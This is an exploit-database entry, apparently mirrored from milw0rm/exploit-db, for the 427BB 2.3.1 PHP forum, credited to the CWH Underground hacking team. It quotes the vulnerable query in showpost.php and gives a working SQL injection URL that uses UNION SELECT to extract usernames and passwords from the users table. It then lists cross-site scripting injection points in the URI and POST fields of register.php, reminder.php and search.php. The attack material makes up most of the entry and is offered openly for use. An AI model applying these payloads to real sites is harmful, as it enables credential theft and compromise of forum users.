[] NeoSense
E X P L O I T S
title author type platform port cve id

427bb 2.3.1 - SQL Injection / Cross-Site Scripting

Author: CWH Underground
type: webapps
platform: php
port: 
date_added: 2008-06-04 
date_updated: 2016-12-07 
verified: 1 
codes: OSVDB-45974;CVE-2008-2561;OSVDB-45973;CVE-2008-2560;OSVDB-45972;OSVDB-45971 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comfourtwosevenbb-2.3.1.tar.gz
============================================================
 427BB 2.3.1 (SQL/XSS) Multiple Remote Vulnerabilities
============================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /
  / XXXXXX /
 (________(
  `------'

AUTHOR : CWH Underground
DATE   : 4 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : 427BB
 VERSION     : 2.3.1
 DOWNLOAD    : http://fourtwosevenbb.sourceforge.net/
#####################################################

---SQL Injection Exploit [showpost.php]---

##############################################
Vulnerable: showpost.php

118: $sql = "SELECT ID, UserName, Post, UTime, IP, InReplyTo, ThreadID From " . $t_prefix . "Posts WHERE ID=$post_id";
119:
120: $res = mysql_query($sql);

###############################################

Exploit:

http://[target]/[path]/showpost.php?ForumID=1&post=1 union select 1,UserName,3,4,5,Password,7 FROM 427bb_personal WHERE ID=1--



---Multiple Remote XSS Exploit---

###########
XSS in URI
###########

Example:

http://[target]/[path]/register.php/<XSS>
http://[target]/[path]/reminder.php/<XSS>
http://[target]/[path]/search.php/<XSS>

####################
XSS with POST Method
####################

Example:

http://[target]/[path]/register.php
[-]POST variable "uname"
[-]POST variable "email"
[-]POST variable "email2"

http://[target]/[path]/reminder.php
[-]POST variable "email"

http://[target]/[path]/search.php
[-]POST variable "keywords"

##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-05]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.